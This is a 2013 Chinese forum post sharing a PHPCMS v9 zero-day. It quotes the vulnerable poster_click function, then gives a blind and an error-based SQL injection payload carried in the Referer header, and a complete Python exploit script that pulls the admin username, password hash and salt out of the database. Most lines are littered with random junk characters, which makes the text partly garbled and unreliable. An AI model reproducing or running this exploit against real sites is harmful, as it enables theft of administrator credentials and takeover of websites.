有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:( ^0 s& K6 O+ q7 |% i
( p( K" ]. s; B0 X问题函数\phpcms\modules\poster\index.php! u! k9 ?- ?' B+ w, Q4 M; e
; V9 _) u4 C% G; q/ h8 j) P+ Xpublic function poster_click() {
7 T4 G5 Z6 _8 u0 K$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
& B" e, d: I* t6 V4 A$r = $this->db->get_one(array('id'=>$id));
5 w$ U2 ]3 J( `$ K5 W6 D/ Dif (!is_array($r) && empty($r)) return false;
( A" J$ E" ?3 d4 k) |5 Q$ip_area = pc_base::load_sys_class('ip_area');
8 C9 R! y. |2 n9 `9 M$ip = ip();
( ]$ [7 ^$ Y) x4 I1 O. [$area = $ip_area->get($ip);
0 h6 \; N: L+ n( L6 j$username = param::get_cookie('username') ? param::get_cookie('username') : '';
8 y* l& ~0 Z4 U0 _' L- L- h8 oif($id) {& W$ b6 [; E! c% b* |! f8 c, n4 J
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
/ c. h# z* i- t$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));5 F# |% m7 y3 S3 ^
}
5 R2 O+ X4 ^6 x3 I0 b4 U0 Y# I$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));% a c$ u3 u- w6 s, H+ L
$setting = string2array($r['setting']);$ l% D( r" [- ?6 Y: W
if (count($setting)==1) {
2 ?: h# [9 Z) c6 m# ^, A" M$url = $setting['1']['linkurl'];
; @+ [+ j! ], G+ j& P} else {/ \; c9 \0 K& y. }
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];, ]5 H# B) m; j/ W) q8 B
}
$ t) s- m3 f$ e* w# T9 rheader('Location: '.$url);
1 B* B, h& E$ S- J7 V}6 l. x/ B$ H0 s3 u! l
) ^1 ]- K5 M" d9 C. N, v
1 _1 w. a& s' V! ^5 c* V l$ D$ ~
利用方式:0 f# L6 F$ k" k5 }8 t
( n' E% O5 J. N; M
1、可以采用盲注入的手法:
+ P/ S9 }8 N- ?: K* c4 v/ q& t
9 f3 P7 v, w& s5 N. \referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
* v. Y5 _6 [; n0 a; `+ h0 h5 i7 `. b: u h; q# {7 m8 W
通过返回页面,正常与否一个个猜解密码字段。9 i7 Y# ~5 x! y, p3 `. c$ o
* S' p& X2 o, T O- e
2、代码是花开写的,随手附上了:: [4 X5 l3 }0 y
: Z: k6 E4 _5 q. |" P1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#/ s4 N( a- Y, g* Y
2 b8 u5 H9 R3 x/ L/ g3 S
此方法是爆错注入手法,原理自查。
0 W8 e$ N- K6 O* `- D' v' G- N" p5 u. c; ]* j0 G
d+ {* A# y- m7 j2 V0 n
- V- R' B6 V9 r2 f3 `; y- |利用程序:3 N# u! S7 J( P
. \3 q2 C4 a& k# O#!/usr/bin/env python) ~& Q5 E+ N; K3 H/ i
import httplib,sys,re: F5 E% U6 C- E9 u6 k, S7 l
" n( x& h/ U0 E$ j% d
def attack():
+ d4 h! X$ Y6 C) {& Z4 Kprint “Code by Pax.Mac Team conqu3r!”
2 h( p' O. K" Wprint “Welcome to our zone!!!”
7 y: u7 _9 \; ^+ J, ?url=sys.argv[1]
7 L W" y+ r" epaths=sys.argv[2]- R$ h) R- v" N7 ~
conn = httplib.HTTPConnection(url)
0 b& P. z; ?+ _- [% N' Ui_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
! Z. `, v. h' v( q5 {“Accept”: “text/plain”,
, I7 R6 m1 i2 e3 Y2 S/ m2 S“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
( z/ `6 n5 m! b# Qconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers): X) u* y0 ^/ R0 I+ V
r1 = conn.getresponse()
1 e' o) e7 o+ j! Y/ vdatas=r1.read()! H& h3 h2 F( I5 P
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
; `2 Y. s% X% tprint datas[0]0 M& U" q5 `* {* ~. W
conn.close()! M, G. G8 U; M: d( G! z. U o
if __name__==”__main__”:
6 ^- F: p( C2 o& \8 b- zif len(sys.argv)<3:; s, F! A( a5 U
print “Code by Pax.Mac Team conqu3r”0 P1 ^2 Z' X% [4 P
print “Usgae:” Q) Q* B6 ?, A0 a, Q5 S$ N
print “ phpcmsattack.py www.paxmac.org /”
: @+ z+ c s9 a1 @7 u: A% Mprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
+ p4 r9 X; O1 }2 v. G3 nsys.exit(1)
. e# S. ^* ^, n, b9 u7 |attack()5 P4 s9 O8 @3 W7 m! y$ f
, ]& j* B8 L: |3 y3 B4 F |
发表于 2013-1-11 21:01:00
收藏
支持
反对